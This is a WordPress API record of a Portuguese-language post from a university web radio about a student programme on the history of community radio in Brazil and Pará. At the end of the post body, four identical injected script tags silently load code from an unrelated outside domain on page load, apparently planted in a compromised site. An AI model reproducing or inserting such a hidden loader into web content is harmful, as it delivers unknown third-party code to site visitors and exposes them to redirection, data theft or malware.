{"id":14021,"date":"2023-09-19T20:07:46","date_gmt":"2023-09-19T23:07:46","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=14021"},"modified":"2025-10-21T12:55:10","modified_gmt":"2025-10-21T15:55:10","slug":"radios-comunitarias-no-brasil","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/","title":{"rendered":"R\u00e1dios Comunit\u00e1rias no Brasil"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;R\u00e1dios comunit\u00e1rias&#8221;<\/p><p class=\"category\">Espa\u00e7o Experimental<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/ESPACO-EXPERIMENTAL-PROGRAMA-FALA-COMUNIDADE-2022.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>R\u00e1dios Comunit\u00e1rias \u00e9 o tema do quinto programa da s\u00e9rie Ondas do R\u00e1dio em destaque no&nbsp;Espa\u00e7o Experimental. Os trabalhos foram realizados durante a atividade curricular dos alunos e alunas da&nbsp;Faculdade de Comunica\u00e7\u00e3o da UFPA, para a disciplina Introdu\u00e7\u00e3o ao Radiojornalismo, ministrada pela professora Net\u00edlia Seixas.&nbsp;<\/p>\n\n\n\n<p>O \u00faltimo programa da s\u00e9rie Ondas do R\u00e1dio foi produzido pelos estudantes Ant\u00f4nia Ribeiro, Ednei Campos, Fernando Assun\u00e7\u00e3o e Denison Ferreira, que narram o contexto hist\u00f3rico das r\u00e1dios comunit\u00e1rias no Brasil e no Par\u00e1.<\/p>\n\n\n\n<p>Assim, os estudantes relatam que as r\u00e1dios comunit\u00e1rias surgiram no Brasil como emissoras livres e com o objetivo de divulgar as causas sociais, em defesa das comunidades, por melhores condi\u00e7\u00f5es de vida, informando a popula\u00e7\u00e3o sobre os seus direitos e tamb\u00e9m aproximando as comunidades das lutas sociais.<\/p>\n\n\n\n<p>Os primeiros registros desse fen\u00f4meno radiof\u00f4nico comunit\u00e1rio no Brasil, datam de 1985 com o surgimento da R\u00e1dio Teresa relacionada ao sindicado dos Banc\u00e1rios. No Par\u00e1, a pioneira foi a R\u00e1dio Er\u00ea FM que funcionava no Sindicato dos Radialistas e que acabou sendo fechada por falta de recursos e planejamento por parte dos fundadores.<\/p>\n\n\n\n<p>A boa not\u00edcia, \u00e9 que segundo Frank Castro, diretor do Sindicato dos Radialistas do Par\u00e1 e coordenador da r\u00e1dio comunit\u00e1ria Onda Livre, novas r\u00e1dios comunit\u00e1rias est\u00e3o sempre surgindo no Estado e em diferentes bairros de Bel\u00e9m como Jurunas e Terra Firme, al\u00e9m de uma esta\u00e7\u00e3o no pr\u00f3prio sindicato.<\/p>\n\n\n\n<p>\u201cA ideia que a gente possa se unir para fazer um trabalho em conjunto, e uma das propostas que eu defendo \u00e9 que a gente pegue essas pessoas que est\u00e3o querendo trabalhar nas r\u00e1dios comunit\u00e1rias para mostrar as atividades e a\u00e7\u00f5es delas\u201d, informa Frank Castro. &nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>Mas como as r\u00e1dios comunit\u00e1rias atuam e em qual frequ\u00eancia elas operam? Neste epis\u00f3dio, quest\u00f5es como essas s\u00e3o abordadas de forma did\u00e1tica e concisa, elevando ainda mais a import\u00e2ncia das r\u00e1dios comunit\u00e1rias para a democratiza\u00e7\u00e3o do acesso \u00e0 informa\u00e7\u00e3o.<\/p>\n\n\n\n<p>O programa Fala Comunidade sobre as r\u00e1dios comunit\u00e1rias no Brasil e no Par\u00e1 \u00e9 uma produ\u00e7\u00e3o dos estudantes da turma de jornalismo 2021: Ant\u00f4nia Ribeiro, Edinei Campos, Fernando Assun\u00e7\u00e3o e Denison Ferreira, orientados pela professora Net\u00edlia Seixas. &nbsp;<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"R\u00e1dios Comunit\u00e1rias no Brasil\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/\" aria-label=\"Read more about R\u00e1dios Comunit\u00e1rias no Brasil\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":14053,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[161],"tags":[],"class_list":["post-14021","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-espaco-experimental"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>R\u00e1dios Comunit\u00e1rias no Brasil - Radio Web UFPA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"R\u00e1dios Comunit\u00e1rias no Brasil - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"... Ler mais\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-09-19T23:07:46+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T15:55:10+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"R\u00e1dios Comunit\u00e1rias no Brasil\",\"datePublished\":\"2023-09-19T23:07:46+00:00\",\"dateModified\":\"2025-10-21T15:55:10+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/\"},\"wordCount\":425,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1\",\"articleSection\":[\"Espa\u00e7o Experimental\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/\",\"name\":\"R\u00e1dios Comunit\u00e1rias no Brasil - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1\",\"datePublished\":\"2023-09-19T23:07:46+00:00\",\"dateModified\":\"2025-10-21T15:55:10+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1\",\"width\":1024,\"height\":768,\"caption\":\"R\u00e1dios Comunit\u00e1rias\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"R\u00e1dios Comunit\u00e1rias no Brasil\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"R\u00e1dios Comunit\u00e1rias no Brasil - Radio Web UFPA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/","og_locale":"pt_BR","og_type":"article","og_title":"R\u00e1dios Comunit\u00e1rias no Brasil - Radio Web UFPA","og_description":"... Ler mais","og_url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-09-19T23:07:46+00:00","article_modified_time":"2025-10-21T15:55:10+00:00","og_image":[{"width":1024,"height":768,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"R\u00e1dios Comunit\u00e1rias no Brasil","datePublished":"2023-09-19T23:07:46+00:00","dateModified":"2025-10-21T15:55:10+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/"},"wordCount":425,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1","articleSection":["Espa\u00e7o Experimental"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/","url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/","name":"R\u00e1dios Comunit\u00e1rias no Brasil - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1","datePublished":"2023-09-19T23:07:46+00:00","dateModified":"2025-10-21T15:55:10+00:00","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1","width":1024,"height":768,"caption":"R\u00e1dios Comunit\u00e1rias"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/radios-comunitarias-no-brasil\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"R\u00e1dios Comunit\u00e1rias no Brasil"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/09\/user_2071330001.jpg?fit=1024%2C768&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3E9","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/14021","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=14021"}],"version-history":[{"count":9,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/14021\/revisions"}],"predecessor-version":[{"id":17771,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/14021\/revisions\/17771"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/14053"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=14021"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=14021"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=14021"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}